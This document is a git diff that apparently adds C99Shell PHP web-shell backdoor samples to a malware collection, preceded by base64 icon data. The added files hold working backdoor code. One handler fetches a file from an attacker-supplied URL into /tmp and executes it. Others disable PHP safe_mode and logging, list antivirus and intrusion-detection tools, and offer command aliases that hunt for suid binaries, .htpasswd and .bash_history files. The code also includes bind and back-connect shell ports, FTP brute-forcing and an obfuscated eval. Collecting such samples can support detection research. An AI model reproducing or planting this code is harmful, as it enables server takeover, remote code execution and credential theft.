+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMA \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.am b/PHP/Backdoor.PHP.C99Shell.am new file mode 100644 index 00000000..8ef7a470 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.am @@ -0,0 +1,80 @@ +Not Found");} + + if(isset($_POST['start_socks'],$_POST['download_path'])) + { + function execute($cfe) + { + $res = ''; + if(@function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } + elseif(@function_exists('shell_exec')) $res = @shell_exec($cfe); + elseif(@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } + elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } + } + + @$f=fopen('/tmp/httpd_conf.tmp.php','w'); + fwrite($f,file_get_contents($_POST['download_path'])); fclose($f); + $path = execute("which php"); + @execute("$path /tmp/httpd_conf.tmp.php &"); + die; + } + +$language='eng'; + +$auth = 0; + +$name='7d1f6442a9ed59e62f93dcbc2695baa6'; +$pass='7d1f6442a9ed59e62f93dcbc2695baa6'; + +//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 +@setlocale(LC_ALL,'ru_RU.cp1251'); + +@ini_restore("safe_mode"); +@ini_restore("open_basedir"); +@ini_restore("safe_mode_include_dir"); +@ini_restore("safe_mode_exec_dir"); +@ini_restore("disable_functions"); +@ini_restore("allow_url_fopen"); + +if(@function_exists('ini_set')) + { + @ini_set('error_log',NULL); + @ini_set('log_errors',0); + @ini_set('file_uploads',1); + @ini_set('allow_url_fopen',1); + } +else + { + @ini_alter('error_log',NULL); + @ini_alter('log_errors',0); + @ini_alter('file_uploads',1); + @ini_alter('allow_url_fopen',1); + } + +error_reporting(E_ALL); + +/* Äëÿ øàïêè */ +$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); +$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm', +'tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); +$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); +$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/'); + +/* Äëÿ ÷òåíèÿ ëèñòèíãà äèðû ÷åðåç realpath() */ +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ"; +//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz"; +//$chars_rlph = "_-.01234567890"; +$chars_rlph = "abcdefghijklnmopqrstuvwxyz"; + +$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php', +'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root', +'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs', +'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing','Windows', +'Documents and Settings','Program Files','boot.ini','apache'); + +/******************************************************************************************************/ + +eval(gzinflate(base64_decode(''))); ?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.ao b/PHP/Backdoor.PHP.C99Shell.ao new file mode 100644 index 00000000..1d138015 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.ao @@ -0,0 +1,3318 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} + else {$arr = stripslashes($arr);} + } + } + strips($GLOBALS); +} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "The"; +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"];} + +$surl_autofill_include = TRUE; + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) +{ + $include = "&"; + foreach (explode("&",getenv("QUERY_STRING")) as $v) + { + $v = explode("=",$v); + $name = urldecode($v[0]); + $value = urldecode($v[1]); + foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) + { + if (strpos($value,$needle) === 0) + { + $includestr .= urlencode($name)."=".urlencode($value)."&"; + } + } + } + if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";} +} +if (empty($surl)) +{ + $surl = "?".$includestr; +} +$surl = htmlspecialchars($surl); +$timelimit = 0; +$login = ""; +$pass = ""; +$md5_pass = ""; + +$host_allow = array("*"); +$login_txt = "Restricted area"; +$accessdeniedmess = $shver.": access denied"; +$gzipencode = TRUE; +$updatenow = FALSE; +$c99sh_updateurl = ""; +$c99sh_sourcesurl = ""; +$filestealth = TRUE; +$donated_act = array("", +"gofile","ls","f","sql","mkdir","ftpquickbrute","d","phpinfo","security","mkfile", +"encoder","fsbuff","selfremove","update","feedback","search","chmod","upload", +"delete","paste","copy","cut","unselect","cmd","processes","tools","eval","about" +); +$curdir = "./"; +$tmpdir = ""; +$tmpdir_log = "./"; +$log_email = "y0_oy@yahoo.com.cn"; +$sort_default = "0a"; +$sort_save = TRUE; +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), + array("config.php",1) +); +$safemode_diskettes = array("a"); +$hexdump_lines = 8; +$hexdump_rows = 24; +$nixpwdperpage = 100; +$bindport_pass = "c99"; +$bindport_port = "31373"; +$bc_port = "31373"; +$datapipe_localport = "8081"; +if (!$win) +{ + $cmdaliases = array( + array("------------ ls -la ------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("----------- dir -------------", "dir"), + array("show opened ports", "netstat -an") + ); +} +$sess_cookie = "c99shvars"; +$usefsbuff = TRUE; +$copy_unset = FALSE; +$quicklaunch = array( + array("Home",$surl), + array("Back","#\" onclick=\"history.back(1)"), + array("Forward","#\" onclick=\"history.go(1)"), + array("Up",$surl."act=ls&d=%upd&sort=%sort"), + array("Search",$surl."act=search&d=%d"), + array("Buffer",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Process",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Security",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Feedback",$surl."act=feedback&d=%d") +); +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +// \/ Jangan diedit << bahaya \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ + $lastdir = realpath("."); + chdir($curdir); + if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} + $sess_data = unserialize($_COOKIE["$sess_cookie"]); + if (!is_array($sess_data)) {$sess_data = array();} + if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} + if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + $disablefunc = @ini_get("disable_functions"); + if (!empty($disablefunc)) + { + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = 